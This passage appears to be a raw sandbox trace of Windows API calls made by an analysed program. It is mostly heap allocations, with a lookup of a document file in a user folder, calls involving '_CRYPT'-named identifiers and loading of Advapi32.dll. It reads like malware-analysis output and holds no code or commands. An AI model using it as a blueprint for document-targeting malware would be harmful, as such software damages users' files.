lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ddc140, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x3766f560, ftLastAccessTime.dwHighDateTime=0x1d5efae, ftLastWriteTime.dwLowDateTime=0x3766f560, ftLastWriteTime.dwHighDateTime=0x1d5efae, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="1ft lPPb9LICRxn6.doc", cAlternateFileName="1FTLPP~1.DOC")) returned 0x41ac700 [0078.603] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.604] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.604] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.605] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.605] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.606] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.606] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.607] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0078.608] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.608] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.609] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 1 [0078.609] TranslateMessage (lpMsg=0x144ee2c) returned 0 [0078.609] DispatchMessageW (lpMsg=0x144ee2c) returned 0x0 [0078.609] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0078.610] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0078.610] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.610] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.611] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: 